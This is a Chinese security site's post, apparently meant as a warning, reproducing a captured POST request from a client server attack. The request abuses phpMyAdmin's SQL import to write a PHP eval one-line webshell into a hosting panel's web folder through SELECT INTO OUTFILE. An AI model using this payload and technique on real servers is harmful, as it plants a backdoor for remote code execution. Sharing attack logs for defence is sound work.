利用phpMyAdmin,MySQL进行挂马的POST提交一句话木马的代码_PHP技巧_龙虎鹰师网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

利用phpMyAdmin,MySQL进行挂马的POST提交一句话木马的代码

作者:龙虎鹰师网安 来源: 浏览次数:0

本篇关键词:利用phpMyAdminMySQL
龙虎鹰师网安网讯:一段利用phpMyAdmin,MySQL和N点主机管理系统进行挂马的POST提交一句话木马的代码!
一段利用phpMyAdminMySQLN点主机管理系统进行挂马的POST提交一句话木马的代码!
在一客户的机器上提取的希望大家以后多加小心,这些你认为很安全的位置正是黑客可能利用的位置!
  1. Mon Feb 18 20:49:34 2013 - Url:http://192.168.0.11/import.php?
  2.  
  3. {IP}:50.77.8.38
  4.  
  5. {PostData}:-----------------------------7dd13823120224
  6.  
  7. Content-Disposition: form-data; name="is_js_confirmed"
  8.  
  9.  
  10.  
  11. 0
  12.  
  13. -----------------------------7dd13823120224
  14.  
  15. Content-Disposition: form-data; name="db"
  16.  
  17.  
  18.  
  19. test
  20.  
  21. -----------------------------7dd13823120224
  22.  
  23. Content-Disposition: form-data; name="token"
  24.  
  25.  
  26.  
  27. 90a81bbecd0412af348b2a4bfd52f59d
  28.  
  29. -----------------------------7dd13823120224
  30.  
  31. Content-Disposition: form-data; name="pos"
  32.  
  33.  
  34.  
  35. 0
  36.  
  37. -----------------------------7dd13823120224
  38.  
  39. Content-Disposition: form-data; name="goto"
  40.  
  41.  
  42.  
  43. db_sql.php
  44.  
  45. -----------------------------7dd13823120224
  46.  
  47. Content-Disposition: form-data; name="zero_rows"
  48.  
  49.  
  50.  
  51. 您的 SQL 语句已成功运行
  52.  
  53. -----------------------------7dd13823120224
  54.  
  55. Content-Disposition: form-data; name="prev_sql_query"
  56.  
  57.  
  58.  
  59.  
  60.  
  61. -----------------------------7dd13823120224
  62.  
  63. Content-Disposition: form-data; name="sql_query"
  64.  
  65.  
  66.  
  67. Create TABLE a (cmd text NOT NULL);
  68.  
  69. Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
  70.  
  71. select cmd from a into   outfile 'C:/Program Files/NpointSoft/npointhost1.9.6/web/ss.php';
  72.  
  73. Drop TABLE IF EXISTS a;
  74.  
  75. -----------------------------7dd13823120224
  76.  
  77. Content-Disposition: form-data; name="sql_delimiter"
  78.  
  79.  
  80.  
  81. ;
  82.  
  83. -----------------------------7dd13823120224
  84.  
  85. Content-Disposition: form-data; name="show_query"
  86.  
  87.  
  88.  
  89. 1
  90.  
  91. -----------------------------7dd13823120224
  92.  
  93. Content-Disposition: form-data; name="SQL"
  94.  
  95.  
  96.  
  97. 执行
  98.  
  99. -----------------------------7dd13823120224
    龙虎鹰师网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-19647-1.html
网站维护教程更新时间:2013-02-19 10:31:59  【打印此页】  【关闭
全站连接N点 | 龙虎鹰师网安 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。龙虎鹰师网安服务器维护基地招商进行中!请QQ:29769479

footer  footer  互联网安全  footer